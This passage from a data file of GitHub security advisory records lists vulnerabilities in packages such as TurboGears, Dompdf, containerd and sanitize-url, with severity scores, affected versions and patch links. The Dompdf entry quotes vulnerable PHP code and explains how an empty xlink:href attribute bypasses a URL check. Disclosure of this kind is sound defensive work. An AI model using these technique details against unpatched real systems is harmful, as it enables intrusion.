{'type': 'PACKAGE', 'url': 'https://github.com/3breadt/dd-plist'}, {'type': 'WEB', 'url': 'https://github.com/3breadt/dd-plist/releases/tag/dd-plist-1.18'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221486'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221486'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:08:04Z', 'nvd_published_at': '2023-02-20T11:15:00Z'}" 1.4.0,GHSA-8q38-w56m-qq2c,2023-02-14T21:26:39Z,2023-02-04T09:30:21Z,,['CVE-2019-25101'],Header injection in TurboGears,A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The name of the patch is f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'TurboGears'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25101'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/commit/f68bbaba47f4474e1da553aa51564a73e1d92a84'}, {'type': 'PACKAGE', 'url': 'https://github.com/OnShift/turbogears'}, {'type': 'WEB', 'url': 'https://github.com/OnShift/turbogears/releases/tag/v1.0.11.11'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220059'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220059'}]","{'cwe_ids': ['CWE-113'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:26:39Z', 'nvd_published_at': '2023-02-04T08:15:00Z'}" 1.4.0,GHSA-x623-hr8h-7g5v,2023-02-10T22:32:39Z,2023-02-03T21:30:21Z,,['CVE-2022-47762'],Path Traversal in gin-vue-admin,"In gin-vue-admin < 2.5.5, the download module has a Path Traversal vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/flipped-aurora/gin-vue-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-47762'}, {'type': 'WEB', 'url': 'https://github.com/flipped-aurora/gin-vue-admin/issues/1309'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:32:39Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}" 1.4.0,GHSA-p64j-r5f4-pwwx,2023-02-06T23:38:18Z,2023-02-06T23:38:18Z,,['CVE-2020-36067'],Improper Validation of Array Index in GJSON,GJSON < 1.6.6 allows attackers to cause a denial of service (panic: runtime error: slice bounds out of range) via a crafted GET call.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36067'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/196'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/bf4efcb3c18d1825b2988603dea5909140a5302b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0054'}]","{'cwe_ids': ['CWE-129'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:38:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-56gj-mvh6-rp75,2023-02-08T16:18:55Z,2023-02-07T18:16:23Z,,['CVE-2023-24813'],URI validation failure on SVG parsing. Bypass of CVE-2023-23924,"### Summary Due to the difference in the attribute parser of Dompdf and php-svg-lib, an attacker can still call arbitrary URLs with arbitrary protocols. ### Details Dompdf parses the href attribute of `image` tags with the following code: [`src/Image/Cache.php` line 135-150](https://github.com/dompdf/dompdf/blob/2a8a6b80fcaa5148ace50f35a10979fe00c6a35d/src/Image/Cache.php#L135-L150) ``` php function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) { if (strtolower($name) === ""image"") { $attributes = array_change_key_case($attributes, CASE_LOWER); $url = $attributes[""xlink:href""] ?? $attributes[""href""]; if (!empty($url)) { $inner_full_url = Helpers::build_url($parsed_url[""protocol""], $parsed_url[""host""], $parsed_url[""path""], $url); if ($inner_full_url === $full_url) { throw new ImageException(""SVG self-reference is not allowed"", E_WARNING); } [$resolved_url, $type, $message] = self::resolve_url($url, $parsed_url[""protocol""], $parsed_url[""host""], $parsed_url[""path""], $options); if (!empty($message)) { throw new ImageException(""This SVG document references a restricted resource. $message"", E_WARNING); } } } }, ``` As you can see from the code snippet above, it respects `xlink:href` even if `href` is specified. ``` php $url = $attributes[""xlink:href""] ?? $attributes[""href""]; ``` However, php-svg-lib, which is later used to parse the svg file, parses the href attribute with the following code: [`src/Svg/Tag/Image.php` line 51-57](https://github.com/dompdf/php-svg-lib/blob/76876c6cf3080bcb6f249d7d59705108166a6685/src/Svg/Tag/Image.php#L51-L57) ``` php if (isset($attributes['xlink:href'])) { $this->href = $attributes['xlink:href']; } if (isset($attributes['href'])) { $this->href = $attributes['href']; } ``` Since `href` is respected if both `xlink:href` and `href` is specified, it's possible to bypass the protection on the Dompdf side by providing an empty `xlink:href` attribute. ### Impact An attacker can exploit the vulnerability to call arbitrary URLs with arbitrary protocols if they provide an SVG file to the Dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, which will lead, at the very least, to arbitrary file deletion and might lead to remote code execution, depending on available classes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'dompdf/dompdf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.2'}, {'fixed': '2.0.3'}]}], 'versions': ['2.0.2']}]","[{'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/security/advisories/GHSA-56gj-mvh6-rp75'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24813'}, {'type': 'WEB', 'url': 'https://github.com/dompdf/dompdf/commit/95009ea98230f9b084b040c34e3869ef3dccc9aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/dompdf/dompdf'}]","{'cwe_ids': ['CWE-436'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T18:16:23Z', 'nvd_published_at': '2023-02-07T19:15:00Z'}" 1.4.0,GHSA-mc8h-8q98-g5hr,2023-02-24T16:23:59Z,2023-02-24T16:23:59Z,,[],Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all,"The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked. Thanks to the Rust security team for identifying the problem and alerting us to it.",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'remove_dir_all'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr'}, {'type': 'WEB', 'url': 'https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead'}, {'type': 'PACKAGE', 'url': 'https://github.com/XAMPPRocky/remove_dir_all'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0018.html'}]","{'cwe_ids': ['CWE-366', 'CWE-367'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:59Z', 'nvd_published_at': None}" 1.4.0,GHSA-q8gg-vj6m-hgmj,2023-03-03T00:11:24Z,2023-02-24T06:30:16Z,,['CVE-2022-48345'],@braintree/sanitize-url Cross-site Scripting vulnerability,sanitize-url (aka @braintree/sanitize-url) before 6.0.1 allows XSS via HTML entities.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@braintree/sanitize-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48345'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/commit/d4bdc89f1743fe3cdb7c3f24b06e4c875f349b0c'}, {'type': 'PACKAGE', 'url': 'https://github.com/braintree/sanitize-url'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.0...v6.0.1'}, {'type': 'WEB', 'url': 'https://github.com/braintree/sanitize-url/compare/v6.0.1...v6.0.2'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:23:15Z', 'nvd_published_at': '2023-02-24T06:15:00Z'}" 1.4.0,GHSA-cf4g-fcf8-3cr9,2023-02-09T19:27:57Z,2023-02-09T19:27:57Z,,[],`pnet_packet` buffer overrun in `set_payload` setters,"As indicated by this [issue](https://github.com/libpnet/libpnet/issues/449#issuecomment-663355987), a buffer overrun is possible in the `set_payload` setter of the various mutable ""Packet"" struct setters. The offending `set_payload` functions were defined within the struct `impl` blocks in earlier versions of the package, and later by the `packet` macro. Fixed in the `packet` macro by [this](https://github.com/libpnet/libpnet/pull/455) PR. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pnet_packet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/libpnet/libpnet/issues/449'}, {'type': 'PACKAGE', 'url': 'https://github.com/libpnet/libpnet'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0167.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-09T19:27:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-vxpm-8hcp-qh27,2023-02-15T18:38:53Z,2023-02-03T21:07:28Z,,['CVE-2023-23941'],Payment information sent to PayPal not necessarily identical to created order,"### Impact If JavaScript-based PayPal checkout methods are used (PayPal Plus, Smart Payment Buttons, SEPA, Pay Later, Venmo, Credit card), the amount and item list sent to PayPal may not be identical to the one in the created order. ### Patches The problem has been fixed with version 5.4.4 ### Workarounds Disable the aforementioned payment methods or use the Security Plugin in version >= 1.0.21. ### References [Shopware blog post](https://news.shopware.com/security-issue-in-paypal-plugin-update-required) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'swag/paypal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/security/advisories/GHSA-vxpm-8hcp-qh27'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23941'}, {'type': 'WEB', 'url': 'https://github.com/shopware/SwagPayPal/commit/57db5f4a57ef0a1646b509b415de9f03bf441b08'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/SwagPayPal'}]","{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-03T21:07:28Z', 'nvd_published_at': '2023-02-03T21:15:00Z'}" 1.4.0,GHSA-32gr-x76g-267w,2023-02-16T23:33:30Z,2023-02-10T15:30:28Z,,['CVE-2015-10077'],SQL injection in webbuilders-group silverstripe-kapost-bridge,A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to version 0.4.0 is able to address this issue. The name of the patch is 2e14b0fd0ea35034f90890f364b130fb4645ff35. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220471.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'webbuilders-group/silverstripe-kapost-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10077'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/commit/2e14b0fd0ea35034f90890f364b130fb4645ff35'}, {'type': 'PACKAGE', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge'}, {'type': 'WEB', 'url': 'https://github.com/webbuilders-group/silverstripe-kapost-bridge/releases/tag/0.4.0'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220471'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220471'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:33:30Z', 'nvd_published_at': '2023-02-10T15:15:00Z'}" 1.4.0,GHSA-xw5j-gv2g-mjm2,2023-02-14T21:53:37Z,2023-02-14T21:53:37Z,,[],Miscompilation in cortex-m-rt 0.7.1 and 0.7.2,"Version 0.7.1 of the `cortex-m-rt` crate introduced a regression causing the stack to NOT be eight-byte aligned prior to calling `main` (or any other specified entrypoint), violating the [stack ABI of AAPCS32], the default ABI used by all Cortex-M targets. This regression is also present in version 0.7.2 of the `cortex-m-rt` crate. This regression can cause certain compiler optimizations (which assume the eight-byte alignment) to produce incorrect behavior at runtime. This incorrect behavior has been [observed in real-world applications]. **It is advised that ALL users of `v0.7.1` and `v0.7.2` of the `cortex-m-rt` crate update to the latest version (`v0.7.3`), AS SOON AS POSSIBLE.** Users of `v0.7.0` and prior versions of `cortex-m-rt` are not affected by this regression. It will be necessary to rebuild all affected firmware binaries, and flash or deploy the new firmware binaries to affected devices. [stack ABI of AAPCS32]: https://github.com/ARM-software/abi-aa/blob/edd7460d87493fff124b8b5713acf71ffc06ee91/aapcs32/aapcs32.rst#6212stack-constraints-at-a-public-interface [observed in real-world applications]: https://github.com/peter9477/test2 ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'cortex-m-rt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0'}, {'fixed': '0.7.3'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/rust-embedded/cortex-m'}, {'type': 'WEB', 'url': 'https://github.com/rust-embedded/cortex-m/discussions/469'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0014.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:53:37Z', 'nvd_published_at': None}" 1.4.0,GHSA-mhgm-52vg-pvvc,2023-02-16T14:12:04Z,2023-02-16T14:12:04Z,,[],Privilege escalation in Strongbox,"### Impact An attacker with read-only access to a Strongbox secret could craft a valid encrypted secret (same id/version). It also makes the audit logs from KMS less useful. The issue is caused by a bug in the underlying AWS Encryption SDK. By default, the encrypted secrets are stored in DynamoDB and an attacker with read-only access would not be able to write the encrypted secret to DynamoDB. So in practice the impact should be limited for most users. Strongbox supports storing data in files as an alternative to DynamoDB. If the attacker had write access to where the files are stored they could make the attack work end-to-end. Similarly, any custom storage backend could also be affected. In order to be backwards compatible Strongbox will not make use of key commitments (another improvement to the AWS Encryption SDK). Strongbox enforces that only one KMS key can be used, and it must match the expected one. This means that an attacker needs write access to both KMS and DynamoDB (or other storage backend) to stage an attack, which is not a scenario Strongbox is designed to protect against. ### Patches Fixed in version 0.5.0. ### Workarounds None ### References - https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r - https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#key-commitment",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.schibsted.security:strongbox-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/security/advisories/GHSA-mhgm-52vg-pvvc'}, {'type': 'WEB', 'url': 'https://github.com/schibsted/strongbox/commit/e61f7c36efa898e8b44de6222cd66d2bcdd073e6'}, {'type': 'PACKAGE', 'url': 'https://github.com/schibsted/strongbox'}]","{'cwe_ids': ['CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:12:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-p9w8-2mpq-49h9,2023-02-14T16:47:13Z,2023-02-04T06:30:15Z,,['CVE-2018-25079'],is-url Inefficient Regular Expression Complexity vulnerability,A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is an unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address this issue. The name of the patch is 149550935c63a98c11f27f694a7c4a9479e53794. It is recommended to upgrade the affected component. VDB-220058 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-url'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25079'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/pull/18'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/commit/149550935c63a98c11f27f694a7c4a9479e53794'}, {'type': 'PACKAGE', 'url': 'https://github.com/segmentio/is-url'}, {'type': 'WEB', 'url': 'https://github.com/segmentio/is-url/releases/tag/v1.2.3'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220058'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220058'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T00:59:15Z', 'nvd_published_at': '2023-02-04T04:15:00Z'}" 1.4.0,GHSA-rfhw-fm4m-52j6,2023-02-17T21:32:40Z,2023-02-10T21:30:24Z,,['CVE-2023-0777'],Authentication Bypass in modoboa,Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0777'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/47d17ac6643f870719691073956a26e4be0a4806'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a17e7a9f-0fee-4130-a522-5a0466fc17c7'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/171744/modoboa-2.0.4-Admin-Takeover.html'}]","{'cwe_ids': ['CWE-305'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:31:45Z', 'nvd_published_at': '2023-02-10T19:15:00Z'}" 1.4.0,GHSA-p7wj-c85f-xq9h,2023-02-16T21:52:22Z,2023-02-08T09:30:24Z,,['CVE-2023-0741'],Answer has Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - DOM in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0741'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/c3001de52af91f09c96e701facbce0b9fa0c98ad'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/78233bfa-871d-45e1-815f-dee73e397809'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:36:22Z', 'nvd_published_at': '2023-02-08T08:15:00Z'}" 1.4.0,GHSA-hmfx-3pcx-653p,2023-02-16T17:38:22Z,2023-02-16T14:11:33Z,,['CVE-2023-25173'],Supplementary groups are not set up properly in github.com/containerd/containerd,"### Impact A bug was found in containerd where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary group access to bypass primary group restrictions in some cases, potentially gaining access to sensitive information or gaining the ability to execute code in that container. Downstream applications that use the containerd client library may be affected as well. ### Patches This bug has been fixed in containerd v1.6.18 and v.1.5.18. Users should update to these versions and recreate containers to resolve this issue. Users who rely on a downstream application that uses containerd's client library should check that application for a separate advisory and instructions. ### Workarounds Ensure that the `""USER $USERNAME""` Dockerfile instruction is not used. Instead, set the container entrypoint to a value similar to `ENTRYPOINT [""su"", ""-"", ""user""]` to allow `su` to properly set up supplementary groups. ### References - https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/ - Docker/Moby: CVE-2022-36109, fixed in Docker 20.10.18 - CRI-O: CVE-2022-2995, fixed in CRI-O 1.25.0 - Podman: CVE-2022-2989, fixed in Podman 3.0.1 and 4.2.0 - Buildah: CVE-2022-2990, fixed in Buildah 1.27.1 Note that CVE IDs apply to a particular implementation, even if an issue is common. ### For more information If you have any questions or comments about this advisory: * Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose) * Email us at [security@containerd.io](mailto:security@containerd.io) To report a security issue in containerd: * [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new) * Email us at [security@containerd.io](mailto:security@containerd.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.18'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-hmfx-3pcx-653p'}, {'type': 'WEB', 'url': 'https://github.com/moby/moby/security/advisories/GHSA-rc4r-wh2q-q6c4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25173'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/133f6bb6cd827ce35a5fb279c1ead12b9d21460a'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-4wjj-jwc9-2x96'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-fjm8-m7m6-2fjp'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-phjr-8j92-w5v7'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.18'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.6.18'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1574'}, {'type': 'WEB', 'url': 'https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T14:11:33Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}" 1.4.0,GHSA-p4xx-w6fr-c4w9,2023-02-10T00:20:55Z,2023-02-02T06:30:26Z,,['CVE-2023-25015'],Clockwork Web contains a Cross-Site Request Forgery Vulnerability with Rails < 5.2,"Clockwork Web before 0.1.2, when used with Rails before 5.2 is used, allows Cross-Site Request Forgery (CSRF). A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include enabling and disabling jobs. All users running an affected release on Rails < 5.2 should upgrade immediately. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'clockwork_web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25015'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/issues/4'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/commit/ec2896503ee231588547c2fad4cb93a94e78f857'}, {'type': 'PACKAGE', 'url': 'https://github.com/ankane/clockwork_web'}, {'type': 'WEB', 'url': 'https://github.com/ankane/clockwork_web/compare/v0.1.1...v0.1.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/clockwork_web/CVE-2023-25015.yml'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T23:07:04Z', 'nvd_published_at': '2023-02-02T04:15:00Z'}" 1.4.0,GHSA-344m-qcjq-xgrf,2023-02-14T00:30:22Z,2023-02-14T00:30:22Z,,[],Vulnerable OpenSSL included in sgx-dcap-quote-verify-python,"sgx-dcap-quote-verify-python includes a statically linked copy of OpenSSL. The version of OpenSSL included in sgx-dcap-quote-verify-python 0.0.1..0.0.2 is vulnerable to a security issue. More details about the OpenSSL vulnerabilities themselves can be found at https://www.openssl.org/news/secadv/20230207.txt. ## Analysis The binding includes OpenSSL version 1.1.1s which is vulnerable to the vulnerabilities disclosed in [OpenSSL Security Advisory from the 7th February 2023](https://www.openssl.org/news/secadv/20230207.txt). The binding does not directly use OpenSSL. The binding calls the SGX Quote Verification Library which uses OpenSSL. ## Explanation The SGX Quote Verification Library uses OpenSSL as a dependency to perform its cryptographic operations and certificate verification. The OpenSSL security advisory mentions multiple vulnerabilities but I believe the most concerning would be CVE-2023-0286 “X.400 address type confusion in X.509 GeneralName”. Its severity is rated high and the advisory states that “this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.” Relying on CRLs obtained from an untrusted party is exactly what can happen when verifying a quote. For instance, the vulnerability could be triggered through the ""sgx_qv_verify_quote"" function which can take untrusted quote collateral as input. The quote collateral contains a CRL and certificate chains. The Quote Verification Library uses OpenSSL to verify the validity of those in order to establish the authenticity of the quote. Thus the vulnerability could be exploited with corrupted/forged collateral and quote. ## Impact According to the advisory the ""vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service"". Transitively I expect the same to be true for the Quote Verification Library. The denial of service impact is not much of a concern I believe since processing forged collateral would most likely stop the software from proceeding normally anyway (forged collateral should be rejected). The part regarding the ability to read memory contents, could result in information disclosure which is a real concern. The quote verification happens on the relying party end, which might use it to check enclave authenticity before providing sensitive data, this vulnerability could therefore result in the leakage of sensitive data. ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 